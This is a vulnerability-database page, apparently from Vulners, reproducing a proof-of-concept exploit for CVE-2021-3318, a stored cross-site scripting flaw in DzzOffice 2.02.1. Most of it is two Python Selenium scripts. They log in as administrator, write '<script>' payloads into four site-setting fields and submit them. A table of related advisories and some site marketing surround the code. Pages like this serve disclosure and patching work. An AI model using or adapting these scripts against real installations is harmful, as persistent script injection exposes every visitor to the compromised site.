Vulners
Lucene search
DzzOffice 2.02.1 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | DzzOffice 2.02.1 - (Multiple) Cross-Site Scripting Exploit | 23 Apr 202100:00 | – | zdt |
 | CVE-2021-3318 | 27 Jan 202120:37 | – | circl |
 | DzzOffice 跨站脚本漏洞 | 27 Jan 202100:00 | – | cnnvd |
 | DzzOffice Cross-Site Scripting Vulnerability | 28 Jan 202100:00 | – | cnvd |
 | CVE-2021-3318 | 27 Jan 202117:13 | – | cve |
 | CVE-2021-3318 | 27 Jan 202117:13 | – | cvelist |
 | DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) | 23 Apr 202100:00 | – | exploitdb |
 | EUVD-2021-26649 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-3318 | 27 Jan 202118:15 | – | nvd |
 | Design/Logic Flaw | 27 Jan 202118:15 | – | prion |
10
`# Exploit Title: XSS attack (app/setting) in DzzOffice-2.02.1
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04.23.2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time
import os
#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/user.php?mod=login"
#enter your login username
username="[email protected]"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="loginsubmit"
# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users
# Otvarai da ne vlazam s kasata
browser.get((website_link))
# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
### Exploit
#time.sleep(3)
element_for_natrutvanie="admin_password"
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
browser.get((laina))
### Next level... :)
os.system("python poc_login_1.py")
print("payload is deployed_0...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
### os.system
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/admin.php?mod=setting"
#enter your login username
username="[email protected]"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="admin_email"
#enter the element for password input field
element_for_password="admin_password"
#enter the element for submit button
element_for_submit="submit"
# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users
# Otvarai da ne vlazam s kasata
browser.get((website_link))
# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
### Exploit
time.sleep(3)
element_for_natrutvanie="settingsubmit"
laina="http://localhost/dzzoffice/admin.php?mod=setting"
browser.get((laina))
### Inner text...
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value
= '<script>alert(\"nu11secur1ty_is_here\");</script>'")
time.sleep(5)
# Submit exploit
signInButton = browser.find_element_by_name(element_for_natrutvanie)
signInButton.click()
print("payload is deployed_1...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
---------------------------------
# Exploit Title: XSS attack (app/setting) in DzzOffice-2.02.1
# Date: 04.23.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty, g3ck0dr1v3r
# Vendor Homepage: http://www.dzzoffice.com/
# Software Link: https://github.com/zyx0814/dzzoffice
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3318
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2021 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00303